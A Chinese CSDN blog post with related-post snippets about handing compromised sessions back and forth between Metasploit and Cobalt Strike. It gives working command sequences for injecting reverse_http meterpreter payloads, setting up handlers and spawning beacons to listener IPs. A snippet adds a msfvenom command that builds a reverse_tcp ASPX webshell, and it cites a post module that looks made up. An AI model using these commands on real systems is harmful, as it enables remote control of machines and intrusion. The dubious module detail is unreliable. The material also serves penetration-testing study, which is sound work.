MSF与CS之间会话传递,互相派生,版本问题踩坑

已于 2023-10-14 22:03:15 修改
阅读量985 收藏 1
点赞数 2
CC 4.0 BY-SA版权
文章标签: 数据库 服务器 运维 网络安全 安全威胁分析
于 2023-10-12 19:54:58 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_29060627/article/details/133798087

查看kali版本:

┌──(root㉿kali)-[~]
└─# msfconsole -V
Framework Version: 6.1.27-dev
                                                                                                                                                                                                        
┌──(root㉿kali)-[~]
└─# cat /etc/os-release    
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2022.1"
VERSION_ID="2022.1"
VERSION_CODENAME="kali-rolling"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="https://www.kali.org/"
SUPPORT_URL="https://forums.kali.org/"
BUG_REPORT_URL="https://bugs.kali.org/"
                                                                                                                                                                                                        
┌──(root㉿kali)-[~]
└─#

cobaltstrike使用版本4.5,可以msf派生给cs4.5,但是反过来cs4.5不能派生给msf,

得换cobaltstrike4.0至4.4(2023-10-14测试)的版本,试过cs3.14版,不能派生给msf6.1,版本毕竟隔太远了

2023.10.14测试发现cs4.7也支持(派生给msf6),可能就是我下载cs4.5有问题(Cobalt Strike 4.X全版本启动器):

https://www.cnblogs.com/XuyeZi/p/16505470.htmlicon-default.png?t=N7T8https://www.cnblogs.com/XuyeZi/p/16505470.html

msf派生给cs(cs4.3和cs4.5都可以)(192.168.50.1:80 是cs的windows/beacon_httpreverse_http监听器):

use exploit/windows/local/payload_inject
set payload windows/meterpreter/reverse_http
set lhost 192.168.50.1
# cs4.1 ipaddr : 192.168.50.1
set lport 80        
set DisablePayloadHandler True
set PrependMigrate True
set session 1   
run

cs4.3派生给msf,不管cs4.3的beacon是x64还是x86,派生给msf的exploit/multi/handler都是x86:

use exploit/multi/handler
set payload windows/meterpreter/reverse_http
#set autorunscript post/windows/manage/migrate name=services.exe 
# 一迁移就会话超时(安装了360和火绒,即使退出了,也有进程在)
set lhost 192.168.50.130
# kali ipaddr : 192.168.50.130
set lport 6666
set ExitOnSession false
set SessionExpirationTimeout 0 
set SessionCommunicationTimeout 0 
exploit -j -z

这个地方显示x86,不知道能搞成x64吗?

beacon> spawn msf
[*] Tasked beacon to spawn (x86) windows/foreign/reverse_http (192.168.50.130:6666)
[+] host called home, sent: 807 bytes
beacon>

【经验总结】CSMSF之间会话传递
TeamsSix 的 CSDN 空间
01-29 2553
0x00 前言 众所周知,Cobalt Strike 的前身是 Armitage,而 Armitage 又可以理解为 Metasploit Framework 的图形界面版,因此 Cobalt Strike Metasploit Framework 在很多地方都是兼容的,所以我们便可以将 Metasploit Framework 攻击产生的会话传递到 Cobalt Strike 上,同样的 Cobalt Strike 的会话也能够传递到 Metasploit Framework Metasplo
CSMSF联动/shell互相反弹
qq_59468567的博客
04-12 598
set DisablePayloadHandler true #默认情况下,payload_inject执行之后会在本地产生一个新的handler,由于已经有了一个不需要再产生一个,所以这里设置为true。set payload windows/meterpreter/reverse_http #两边的payload协议一定要对应的。先建立一个监听器,和msf的要一一对应,上面的ip必须是可以ping通的大部分情况是外网ip。此处标红的对应下面的两个,取决加不加。然后返回前面的增加会话
msfcs互传shell
渗透之路,攻防之间皆学问
04-19 3350
因为cobaltstrike和MSF各有优势,所有有时候需要互传shell。假设cs此时获取了一个shell,然后需要将此shell传给msf 1. 在msf中创建反向监听 use exploit/multi/handler set payload windows/meterpreter/reverse_http set lhost 192.168.
MSFCS会话互相传递
fishfishfishman的博客
08-15 1025
作为C2工具,MSFCS各有千秋,CS有着多种强大的自定义插件和易操作的图形化界面,而MSF集成了针对各类系统的Payload攻击代码,为了针对性的进行攻击,我们有时候会需要将MSF会话转发到CS,或者相反。
MSFCS联动】
一纸荒芜的博客
08-27 3137
msfcs
【渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(MSF联动)】_cobalt 信回话(2)
2401_84969389的博客
05-13 373
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
【渗透测试笔记】之【内网渗透——Cobalt Strike会话管理(MSF联动)】_cobalt 信回话
2401_84969426的博客
05-13 353
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
Csmsf互传shell
2201_75387456的博客
06-02 530
首先咋们需要准备两台kali,一台win10靶机咋们利用kali1打开cs,利用kali2打开msf进行联动;在cs上建立一个监听,名字随便起,这里我起名为test,ip输入kali1的;生成一段payload,并在win10靶机上线(在win10点击生成的payload即可)然后在kali2启动msf,使用监听模块命令:msfconsole //进入msf控制台use exploit/multi/handler //进入监听模块。
利用frp将cs的shell派生msf
weixin_43939009的博客
06-27 853
msf作为内网渗透中强大的工具,集成了许多漏洞利用的EXP,以及各种扫描功能便于使用,今天介绍使用Frp将cs的shell派生msf,满足内网渗透中的需求。 第一步: 首先我们连上cs后,我们需要去监听器修改参数。 我们这里Add添加一个,随便写个名字,这里我写了msf,模式选择foreign HTTP模式,HTTP Host出填写自己的VPS地址,端口随意,我这里是1080端口。填写完毕Save即可。 第二步: 在自己的vps上启动frp服务端,frp不多做介绍,目前主流的内网穿透工具,这里基础使用
内网安全学习(八)---CS&MSF联动
qi_SJQ_的博客
02-17 3856
域横向 CS&MSF 联动 Shell CS->MSF: 创建Foreign监听器 MSF监听模块设置对应端口地址 CS执行Spawn选择监听器 MSF->CSCS创建监听器 MSF载入新模块注入设置对应地址端口 执行CS等待上线 use exploit/windows/local/payload_inject 首先需要两台服务器,一个上线cs一个上线msf 启动上线cs生成木马上线两台主机,之后启动msf。 1)接下来,将CS移交到MSF上: 先添加会话,填写msf主机信息: 配
msfcs联动
bring_coco的博客
05-18 2243
环境:kali(192.168.190.128)NATAPP。
msf派生cs
weixin_48776804的博客
07-19 610
msf派生cs
csmsf权限传递
Wincreds的博客
06-26 342
3. 配置Cobalt Strike:在Cobalt Strike中配置Metasploit RPC设置,使其能够连接到Metasploit的RPC服务。2. 启动Metasploit RPC服务:在Metasploit控制台中启动RPC服务,以便Cobalt Strike可以Metasploit通信。1. 在Metasploit中获取会话:使用Metasploit渗透目标系统并获得会话。4. 接收会话:在Metasploit中配置并监听相应的端口,以接收传递过来的会话
MSF CS 相互派生
最新发布
vortex5的博客
04-17 815
通过 MSF 派生 CS,可以将 MSF会话快速转移到 CS,利用 CS 的隐秘性和后渗透能力;通过 CS 派生 MSF,则可以将 CS 的控制权扩展到 MSF,充分利用 MSF 的漏洞利用模块。这种互助派生的方式极大提升了渗透测试的灵活性。无论是从 MSFCS,还是从 CSMSF,关键在于确保监听地址和端口的一致性,并根据网络环境调整配置。希望这篇文章能为你的渗透测试工作提供实用参考!
csmsf联动
11-18 312
csmsf联动
csmsf权限传递,以及mimikatz抓取明文密码
M372109150的博客
06-15 1606
csmsf权限传递,以及mimikatz抓取win10明文密码
msf联动cs
hmysn的博客
12-31 2254
Cobalt Strike简称CS 用于团队作战使用,由一个服务端和多个客户端组成,能让多个攻击者这在一个团队服务器上共享目标资源和信息,我们在使用msf获得权限以后,可以将信息共享到cs上,使用cs来进行监听以及其他的操作。
Foreign BeaconCSMSF之间会话派发ssh端口转发
热门推荐
Shanfenglan's blog
08-07 33万+
前言 Foreign beacon主要用于将cobalt strike的beacon shell派生MSF上。我们也看到了有两种类型的Foreign beacon,httphttps,他们的区别就是如果CS上的beacon是http的那么就用http类型的foreign beacon,反之亦然。这篇文章会讲CS派发shell到MSF,也会讲其反过程。 如果msfcs的teamserver都在公网,那么派发将会非常简单,直接用公网ip就好。而且teamserver一般只会在公网上,但msf有可能在内网主
kali msf传递会话 cs
03-13
### 将Metasploit Framework会话迁移到Cobalt Strike 在渗透测试过程中,有时需要将在Metasploit Framework(MSF)中获得的shell或meterpreter会话转移到Cobalt Strike(CS)以便利用CS更强大的功能集。以下是实现这一目标的方法。 #### 准备工作环境 确保MSF安装路径位于`/usr/share/metasploit-framework`[^1],并更新至最新版本以避免兼容性问题。通过命令`msfconsole -v`查看当前版本,并按照官方指南使用`apt-get update && apt-get install metasploit-framework`来保持软件处于最新状态[^2]。 #### 创建反向连接载荷 为了建立从受害者机器到攻击者控制下的CS服务器之间的通信通道,在Kali Linux上可以借助于`msfvenom`工具生成适合目标系统的payload文件。例如针对ASP.NET应用程序可执行如下操作: ```bash msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=10.211.55.2 LPORT=3333 -f aspx -o shell.aspx ``` 此命令将会创建一个名为`shell.aspx`的webshell用于部署到远程Web应用环境中等待触发[^5]。 #### 配置Cobalt Strike Listener 提前设置好接收来自受感染主机发起连接请求的服务监听器至关重要。假设已知MSF所在IP地址为`10.0.0.200`以及指定端口号`7777`作为回调参数,则可以在CS界面里新建一个类型为`Windows -> foreign -> reverse_tcp` 的listener实例[^4]。 #### 迁移Meterpreter Session 当成功获取了一个有效的Meterpreter session之后就可以考虑将其转移给CS处理了。具体做法是在MSF console内部输入以下指令完成迁移过程: ```ruby use exploit/multi/script/web_delivery set SRVHOST 10.0.0.200 set URIPATH / exploit -j -z sessions -i <session_id> run post/windows/manage/migrate_to_cobalt_strike SESSION=<session_id> CS_HOST=10.0.0.200 CS_PORT=7777 ``` 上述脚本中的`<session_id>`应替换为实际存在的活动Session编号;而`CS_HOST`和`CS_PORT`则对应之前设定好的CS listener的相关信息。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值